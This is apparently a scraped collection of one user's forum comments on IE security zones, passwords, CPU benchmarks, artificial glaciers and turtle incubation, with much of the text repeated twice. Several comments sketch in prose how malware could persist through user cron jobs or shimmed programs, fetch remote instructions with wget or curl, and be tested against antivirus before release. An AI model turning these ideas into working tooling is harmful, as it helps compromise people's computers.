> That's because IE's javascript engine treats javascript executed from the computer with extra privileges over javascript executed from the "Internet Zone".
Used to be you could modify that, not sure how it is like after Vista and Windows 7.
If you make the security settings strict it breaks some Windows Explorer stuff in XP's "webview" mode. But it works fine in classic mode. In my opinion the classic mode is less likely to be exploitable than the XP "webview" mode, and I'm the sort who prefers classic mode anyway:).
> They're easy to generate/remember and won't be in any dictionary.
Easy to remember for who? I tried something similar before (password generator) and most people still considered them difficult to remember and grumbled...
So I think it's better to: 1) Have them write their passwords down and store them in their purse or wallet. 2) Do not give them powerful accounts where possible.
If you're the sysadmin and the Boss _insists_ on super powerful accounts and wants to stuff like "password" as his password, and you are unable to convince him otherwise, it's not a good situation...
> No idea if they did something with them to make them less mirrory,
Yes, they've been exposed to The Steve's Reality Distortion Field[1]. The recent iphone 4s clearly have not been exposed long enough and need "booster shots", or The Steve was having an "off day"...
I appear to be immune, as I have a MacBook on my desk and I don't like the glossy screen and their chiclet keyboard (the ctrl key is in the wrong place!). I mostly ssh to it from a Windows 7 machine (horrors!:) ).
> My current system is a C2D 1.8GHz E6300 that's now pushing 4 years of age, > yet according to all the benchmarks I've seen by Anntech, Tom's Hardware and others, my performance results are less then 20 percent below the latest/greatest CPU's.
While you probably don't need to upgrade your CPU, I don't see how your CPU can be only 20% slower than the latest and greatest. Even for single-threaded stuff.
Note: I'm even comparing the 2.33GHz C2D to the latest and greatest, since the 1.8GHz one isn't listed. But I'm sure the 2.33GHz C2D should be a bit faster than your 1.8GHz C2D.
For graphically intensive games, though the difference in the average fps would not be as high, the difference in the minimum fps might be, and that might be more important in many real-world scenarios.
In many ways it's quite impressive what Intel has done with the x86. The equivalent of a hypersonic flying pig beating the less "ugly" MIPS and Alphas;).
Assuming nothing breaks, my next upgrade is more likely to be an SSD than CPU, GPU, RAM or HDD. I'm just waiting for the prices to go down to more reasonable levels (and the number of bug reports to dwindle as well;) ).
I jokingly suggested something related before- create some software to have servers to join facebook, and those servers can answer stupid quizzes like "20 Ways to know if you're a Windows 2008 R2 server".
With status messages like: ProcessingNode192 is bored (has nothing to do)... StorageServer01 is feeling degraded (on array #2)...
> From the article it sounds as if the issue in questions is water supply and how changing the normal rate of glacial melt could change how people live.
Quote: As of this year he has built 10 artificial glaciers, using a simple system of pipes and stone dams to pool and direct streams of water into heavily shaded parts of valleys above a given village. During winter the pools become thick ice masses - frozen water tanks for farmers who need reliable summer flows as a hedge against changing weather patterns.
Quote: People in the districts of Baltistan and Gilgit practice 'glacier growing' with the intention of making glaciers that will enhance water availability. This is done by carrying glacier ice from a naturally occurring glacier up to elevations over 4000 m a.s.l., where it is placed in a dug out cave in a scree-slope. Apart from the ice, gourds containing water are also added to interior of the cave. Then a layer of charcoal, and sawdust or wheat husks is put on top of the ice. The workers close off the cave by piling up rocks to cover the entrance.
Lastly, by growing many glaciers, you can affect the albedo of a mountain, or even a mountainous region and thus affect local climate. Darker mountains absorb more heat and thus lose ice faster, reverse that by making more glaciers and other glaciers could appear without you having to make them directly.
As of this year he has built 10 artificial glaciers, using a simple system of pipes and stone dams to pool and direct streams of water into heavily shaded parts of valleys above a given village. During winter the pools become thick ice masses - frozen water tanks for farmers who need reliable summer flows as a hedge against changing weather patterns.
The first one he built was in 1987; it is now two kilometers long and provides supplemental water to four villages. "In four months you can have one million cubic feet of ice," said Norphel, who won a CNN-IBN "Real Heroes" Award in 2008 for his work.
Quote: People in the districts of Baltistan and Gilgit practice 'glacier growing' with the intention of making glaciers that will enhance water availability. This is done by carrying glacier ice from a naturally occurring glacier up to elevations over 4000 m a.s.l., where it is placed in a dug out cave in a scree-slope. Apart from the ice, gourds containing water are also added to interior of the cave. Then a layer of charcoal, and sawdust or wheat husks is put on top of the ice. The workers close off the cave by piling up rocks to cover the entrance.
> In fact the only problem is going to be for those allergic people > - with previous patches all they would get is red skin, an itch, and maybe a localized rash. > Now they risk a full blown type I allergic reaction.
Just curious - does the immune system react to foreign stuff entering the body via the skin surface differently from entering via the digestive system or intramuscular or straight into the bloodstream?
> If the user is able to make and run executable, send and receive over the network, create and delete files, then malware is also going to have that ability.
Assuming you want the minerals on earth at most you'd just want to slow it down to manageable speeds, not stop it (relatively). No point spending extra energy to slow it down only to spend energy to speed up the extracted stuff again.
That said, it often makes very little difference when some idiot runs a PHP webapp full of holes on the webserver.
Once the attacker has exploited your webapp, they may not even need or care to escalate privileges - they probably can already get what they want. Even better if the webapp has the rights to access your crown jewels in a DB somewhere.
Seriously though, what are you going to do if printf fails? Log to a file? What if that fails? Log an error message to syslog? Then what if that fails too?
At a certain point of time it's a waste of time and resource to add extra checks.
In this case the target user would likely notice if printf fails to produce output and deal with it accordingly.
If printf produces output and still fails for some strange reason, the user is unlikely to care.
A professional way is to document it. "NOTE: in some cases printf may fail and the program not produce the desired output", buy the customer dinner and get them to sign off on everything.
If you were one of those pedants, sqrt(5) would actually be the correct answer and 2.23606798 would be incorrect (assuming you were to calculate the length of the hypotenuse).
If I were your teacher and you brought in a slide rule and knew how to use it, it just proves you ain't that stupid and if you were actually cheating it's just for fun, you'd be able to pass anyway.
Uh, what better security model? From what I see Windows NT/2K/XP and say Ubuntu/Suse Linux have pretty much the same security model. OK so defaulting to admin user was a pretty stupid idea, but malware nowadays don't even care so much about admin - zombies that send spam and DDoS do not need admin privileges. So as long as you can get a user to run something, you're in.
Currently at work I'm writing stuff for unix/unixlike software+hardware asset management, and believe me it's not that difficult to write a cross plaform "zombie" script that works on Linux, OSX etc. I wouldn't do that of course but if it ever becomes profitable enough to do so, I'm sure someone in the world will do it.
After all if you have the same Windows users who would type in passwords to unzip password locked zipped files and then launch the malware[1], why wouldn't they do the same for Linux and OSX too? Think those same idiots wouldn't type in perl Britney?
If you only want a spam sending zombie you do not even need root privileges, so you wouldn't even need them to enter passwords.
All you need to do is set up a user cron or at job, or modify/replace/shim a commonly used user-owned program/script. Aunt May ain't gonna even notice.
I'm personally curious whether most antivirus scanners would be able to cope with perl malware. TMTOWTDI and all that (a half decent perl coder could write something that'll churn out versions of ACME:Bleach or similar, and automatically test them on multiple virus programs - so you only "release" malware that passes).
You could create something fairly innocuous, but uses LWP or wget or curl to fetch new instructions and then run those new instructions.
Uh, you could get lower traffic accident statistics BECAUSE more parents don't let their kids out to roam.
Not saying that your point is not true, but to actually prove increased safety you'd also need to have the number of pedestrians+cars over the years. And for children safety you'd need the number of children roaming the streets per year.
FWIW, there's the bit about: "carefully raise them in a climate-controlled hanger" that reminds me of what some bright sparks did in my country (when trying to be helpful):
They collected lots of turtle eggs and incubated them to try to increase survival rates. However ALL the hatchlings turned out to be females.
Turtle gender is determined by the temperature of the eggs:
If there aren't that many eggs from that species, screwing up the gender ratio might be worse than just leaving them in "mama turtle" selected spots (and depths).
In this case I'm guessing that the climate controlled hanger will generate a more natural gender ratio (which probably includes at least one male per generation;) ).
> the few two legged dogs that manage to get around.
You don't need to focus on the rather few two legged dogs.
There are four legged dogs then get around fine on two legs too:
http://www.youtube.com/watch?v=8MUhb00kiXs
Many other examples... So the sample size can be bigger.
> Did they hear about the three legged dog that walked into a saloon?
Walking into saloons[1] are a common way for dogs to become three legged.
[1] http://en.wikipedia.org/wiki/Saloon_(automobile)
> That's because IE's javascript engine treats javascript executed from the computer with extra privileges over javascript executed from the "Internet Zone".
Used to be you could modify that, not sure how it is like after Vista and Windows 7.
See this: How To Add 'My Computer' As the Fifth Internet Explorer Security Zone
http://support.microsoft.com/kb/555599
http://support.microsoft.com/kb/315933
If you make the security settings strict it breaks some Windows Explorer stuff in XP's "webview" mode. But it works fine in classic mode. In my opinion the classic mode is less likely to be exploitable than the XP "webview" mode, and I'm the sort who prefers classic mode anyway :).
> They're easy to generate/remember and won't be in any dictionary.
Easy to remember for who? I tried something similar before (password generator) and most people still considered them difficult to remember and grumbled...
So I think it's better to:
1) Have them write their passwords down and store them in their purse or wallet.
2) Do not give them powerful accounts where possible.
If you're the sysadmin and the Boss _insists_ on super powerful accounts and wants to stuff like "password" as his password, and you are unable to convince him otherwise, it's not a good situation...
Y'know, the greatest threat to US security might be the US government.
1) Who wields the greatest power in the world?
2) Is the entity in #1 really using it for the benefit of the USA? Or for the benefit of others?
It's always bogeyman after bogeyman, "The US is under threat" and neverending wars against drugs/terror/whatever.
> No idea if they did something with them to make them less mirrory,
Yes, they've been exposed to The Steve's Reality Distortion Field[1]. The recent iphone 4s clearly have not been exposed long enough and need "booster shots", or The Steve was having an "off day"...
I appear to be immune, as I have a MacBook on my desk and I don't like the glossy screen and their chiclet keyboard (the ctrl key is in the wrong place!). I mostly ssh to it from a Windows 7 machine (horrors! :) ).
[1] http://www.youtube.com/watch?v=Tn-YesqzvNk
> My current system is a C2D 1.8GHz E6300 that's now pushing 4 years of age,
> yet according to all the benchmarks I've seen by Anntech, Tom's Hardware and others, my performance results are less then 20 percent below the latest/greatest CPU's.
While you probably don't need to upgrade your CPU, I don't see how your CPU can be only 20% slower than the latest and greatest. Even for single-threaded stuff.
See: http://www.anandtech.com/bench/Product/61?vs=142
Note: I'm even comparing the 2.33GHz C2D to the latest and greatest, since the 1.8GHz one isn't listed. But I'm sure the 2.33GHz C2D should be a bit faster than your 1.8GHz C2D.
For graphically intensive games, though the difference in the average fps would not be as high, the difference in the minimum fps might be, and that might be more important in many real-world scenarios.
In many ways it's quite impressive what Intel has done with the x86. The equivalent of a hypersonic flying pig beating the less "ugly" MIPS and Alphas ;).
Assuming nothing breaks, my next upgrade is more likely to be an SSD than CPU, GPU, RAM or HDD. I'm just waiting for the prices to go down to more reasonable levels (and the number of bug reports to dwindle as well ;) ).
I jokingly suggested something related before- create some software to have servers to join facebook, and those servers can answer stupid quizzes like "20 Ways to know if you're a Windows 2008 R2 server".
With status messages like:
ProcessingNode192 is bored (has nothing to do)...
StorageServer01 is feeling degraded (on array #2)...
> From the article it sounds as if the issue in questions is water supply and how changing the normal rate of glacial melt could change how people live.
They may be able to fix that:
http://www.allvoices.com/contributed-news/4932332-indian-engineer-builds-glaciers-to-fight-climate-change
Quote: As of this year he has built 10 artificial glaciers, using a simple system of pipes and stone dams to pool and direct streams of water into heavily shaded parts of valleys above a given village. During winter the pools become thick ice masses - frozen water tanks for farmers who need reliable summer flows as a hedge against changing weather patterns.
Some people have done glacier growing for a long time:
http://www.umb.no/statisk/noragric/publications/master/2007_ingvar_tveiten.pdf
Quote:
People in the districts of Baltistan and Gilgit practice 'glacier growing' with the intention of
making glaciers that will enhance water availability. This is done by carrying glacier ice from
a naturally occurring glacier up to elevations over 4000 m a.s.l., where it is placed in a dug
out cave in a scree-slope. Apart from the ice, gourds containing water are also added to
interior of the cave. Then a layer of charcoal, and sawdust or wheat husks is put on top of the
ice. The workers close off the cave by piling up rocks to cover the entrance.
Lastly, by growing many glaciers, you can affect the albedo of a mountain, or even a mountainous region and thus affect local climate. Darker mountains absorb more heat and thus lose ice faster, reverse that by making more glaciers and other glaciers could appear without you having to make them directly.
They can change relatively rapidly with some human help. Either shrinking or in the following cases growing:
http://www.allvoices.com/contributed-news/4932332-indian-engineer-builds-glaciers-to-fight-climate-change
As of this year he has built 10 artificial glaciers, using a simple system of pipes and stone dams to pool and direct streams of water into heavily shaded parts of valleys above a given village. During winter the pools become thick ice masses - frozen water tanks for farmers who need reliable summer flows as a hedge against changing weather patterns.
The first one he built was in 1987; it is now two kilometers long and provides supplemental water to four villages. "In four months you can have one million cubic feet of ice," said Norphel, who won a CNN-IBN "Real Heroes" Award in 2008 for his work.
http://www.umb.no/statisk/noragric/publications/master/2007_ingvar_tveiten.pdf
Quote:
People in the districts of Baltistan and Gilgit practice 'glacier growing' with the intention of
making glaciers that will enhance water availability. This is done by carrying glacier ice from
a naturally occurring glacier up to elevations over 4000 m a.s.l., where it is placed in a dug
out cave in a scree-slope. Apart from the ice, gourds containing water are also added to
interior of the cave. Then a layer of charcoal, and sawdust or wheat husks is put on top of the
ice. The workers close off the cave by piling up rocks to cover the entrance.
> In fact the only problem is going to be for those allergic people
> - with previous patches all they would get is red skin, an itch, and maybe a localized rash.
> Now they risk a full blown type I allergic reaction.
Just curious - does the immune system react to foreign stuff entering the body via the skin surface differently from entering via the digestive system or intramuscular or straight into the bloodstream?
> If the user is able to make and run executable, send and receive over the network, create and delete files, then malware is also going to have that ability.
Why should it necessarily be so?
https://bugs.launchpad.net/ubuntu/+bug/156693
Assuming you want the minerals on earth at most you'd just want to slow it down to manageable speeds, not stop it (relatively). No point spending extra energy to slow it down only to spend energy to speed up the extracted stuff again.
Hookers, blow and blackjack?
I guess there was some pizza and mountain dew too.
Yeah... Then again if they're all stuck in traffic jams, if they hit a kid, the kid may not even notice :).
Yeah.
That said, it often makes very little difference when some idiot runs a PHP webapp full of holes on the webserver.
Once the attacker has exploited your webapp, they may not even need or care to escalate privileges - they probably can already get what they want. Even better if the webapp has the rights to access your crown jewels in a DB somewhere.
Seriously though, what are you going to do if printf fails? Log to a file? What if that fails? Log an error message to syslog? Then what if that fails too?
At a certain point of time it's a waste of time and resource to add extra checks.
In this case the target user would likely notice if printf fails to produce output and deal with it accordingly.
If printf produces output and still fails for some strange reason, the user is unlikely to care.
A professional way is to document it. "NOTE: in some cases printf may fail and the program not produce the desired output", buy the customer dinner and get them to sign off on everything.
Yeah I'd rather use it too if someone else was going to buy me an iphone.
If you were one of those pedants, sqrt(5) would actually be the correct answer and 2.23606798 would be incorrect (assuming you were to calculate the length of the hypotenuse).
If I were your teacher and you brought in a slide rule and knew how to use it, it just proves you ain't that stupid and if you were actually cheating it's just for fun, you'd be able to pass anyway.
> So I learned to visualize counting on my toes. I wound up with a B.Sc. in theoretical mathematics. They sure showed me.
Uh they sure showed you.
Uh, what better security model? From what I see Windows NT/2K/XP and say Ubuntu/Suse Linux have pretty much the same security model. OK so defaulting to admin user was a pretty stupid idea, but malware nowadays don't even care so much about admin - zombies that send spam and DDoS do not need admin privileges. So as long as you can get a user to run something, you're in.
Currently at work I'm writing stuff for unix/unixlike software+hardware asset management, and believe me it's not that difficult to write a cross plaform "zombie" script that works on Linux, OSX etc. I wouldn't do that of course but if it ever becomes profitable enough to do so, I'm sure someone in the world will do it.
After all if you have the same Windows users who would type in passwords to unzip password locked zipped files and then launch the malware[1], why wouldn't they do the same for Linux and OSX too? Think those same idiots wouldn't type in perl Britney?
[1] Examples: http://www.f-secure.com/v-descs/email-worm_w32_bagle_fy.shtml
If you only want a spam sending zombie you do not even need root privileges, so you wouldn't even need them to enter passwords.
All you need to do is set up a user cron or at job, or modify/replace/shim a commonly used user-owned program/script. Aunt May ain't gonna even notice.
I'm personally curious whether most antivirus scanners would be able to cope with perl malware. TMTOWTDI and all that (a half decent perl coder could write something that'll churn out versions of ACME:Bleach or similar, and automatically test them on multiple virus programs - so you only "release" malware that passes).
You could create something fairly innocuous, but uses LWP or wget or curl to fetch new instructions and then run those new instructions.
> Talk WITH them for a significant part of every day, even if you have something more important to do.
:).
Nah, if you really have something more important to do, do that first. The kids will survive.
But most things aren't that important. Even though they might be more fun or less tiring than talking with the kids
Uh, you could get lower traffic accident statistics BECAUSE more parents don't let their kids out to roam.
Not saying that your point is not true, but to actually prove increased safety you'd also need to have the number of pedestrians+cars over the years. And for children safety you'd need the number of children roaming the streets per year.
FWIW, there's the bit about: "carefully raise them in a climate-controlled hanger" that reminds me of what some bright sparks did in my country (when trying to be helpful):
They collected lots of turtle eggs and incubated them to try to increase survival rates. However ALL the hatchlings turned out to be females.
Turtle gender is determined by the temperature of the eggs:
http://www.sciencedirect.com/science?_ob=ArticleURL&_udi=B6V5X-4002DP2-4&_user=10&_coverDate=12%2F31%2F1995&_rdoc=1&_fmt=high&_orig=search&_sort=d&_docanchor=&view=c&_searchStrId=1403037906&_rerunOrigin=google&_acct=C000050221&_version=1&_urlVersion=0&_userid=10&md5=8218153421fb6ec52b5f99062d99f544
If there aren't that many eggs from that species, screwing up the gender ratio might be worse than just leaving them in "mama turtle" selected spots (and depths).
In this case I'm guessing that the climate controlled hanger will generate a more natural gender ratio (which probably includes at least one male per generation ;) ).